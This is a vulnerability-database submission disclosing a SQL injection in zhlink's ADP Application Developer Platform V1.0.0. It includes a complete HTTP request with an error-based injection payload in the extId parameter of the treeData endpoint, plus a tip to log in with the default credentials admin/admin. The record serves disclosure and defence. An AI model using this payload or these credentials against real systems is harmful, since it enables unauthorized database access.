| 제목 | 智互联(深圳)科技有限公司 ADP应用开发者平台 zhlink V1.0.0 SQL Injection |
|---|
| 설명 | 漏洞地址:x.x.x.x:8083/adpweb/a/login
GET /adpweb/a/sys/office/treeData?companyid=&extId=%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281009983723%29%29%29and%27&isAll=&keywords=111&module=&t=1705660829107&type=1 HTTP/1.1
Host: x.x.x.x:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=5F82478A113439530681B398B1596D9C; zhilink.session.id=2efebc93c5ec4946af83e7d1c81a1bd7; lang=zh_CN; Hm_lvt_82116c626a8d504a5c0675073362ef6f=1705660638; Hm_lpvt_82116c626a8d504a5c0675073362ef6f=1705660673
Referer: http://x.x.x.x:8083/adpweb/a/tag/treeselect?url=%2Fsys%2Foffice%2FtreeData%3Ftype%3D1%26companyid%3D&module=&checked=&extId=&isAll=
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
注入点参数:注入点参数:extId
使用默认口令admin/admin登录后测试注入
payload:/adpweb/a/sys/office/treeData?companyid=&extId=%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281009983723%29%29%29and%27&isAll=&keywords=111&module=&t=1705660829107&type=1 |
|---|
| 원천 | ⚠️ http://x.x.x.x:8083/adpweb/a/login |
|---|
| 사용자 | Id3al (UID 85503) |
|---|
| 제출 | 2025. 07. 31. AM 11:03 (9 개월 ago) |
|---|
| 모더레이션 | 2025. 08. 09. AM 09:46 (9 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 319335 [zhilink 智互联(深圳)科技有限公司 ADP Application Developer Platform 应用开发者平台 treeData SQL 주입] |
|---|
| 포인트들 | 20 |
|---|